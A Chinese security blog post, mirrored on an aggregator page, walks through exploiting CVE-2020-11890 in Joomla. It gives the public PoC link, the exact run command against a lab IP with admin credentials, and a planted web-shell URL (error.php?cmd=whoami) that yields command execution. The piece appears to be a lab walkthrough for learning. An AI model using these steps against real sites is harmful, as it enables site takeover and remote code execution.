终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

CVE-2020-11890 简单利用

知秋一叶 黑白之道 2020-11-07

Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。占有全球6%的网站市场份额,使用PHP语言加上MySQL数据库所开发的软件系统。可以在Linux、 Windows、MacOSX等各种不同的平台上执行。Joomla!2.5.0版本至3.9.16版本中存在输入验证错误漏洞。攻击者可利用该漏洞绕过ACL保护。

影响版本


Joomla < 3.9.17


漏洞介绍


受影响的版本:

3.9.17之前的Joomla核心


用户要求:

管理员帐户(非超级管理员)


获得访问权限:

创建一个新的超级管理员,然后触发RCE。


测试环境


vulfocus一键启动docker环境



漏洞利用


下载poc:


https://github.com/HoangKien1020/CVE-2020-11890/



运行命令


python CVE-2020-11890.py -url http://188.40.189.135:10159/ -u admin -p admin



查看当前用户:


[backcolor=rgba(255, 255, 255, 0.7)]http://188.40.189.135:10159//templates/protostar/error.php?cmd=whoami



利用成功,可以返回当前用户为www-data用户



注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。



推荐文章++++

*PHP imap 远程命令执行漏洞(CVE-2018-19518)

*PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)

*Node.js 目录穿越漏洞(CVE-2017-14849)


    文章有问题?点此查看未经处理的缓存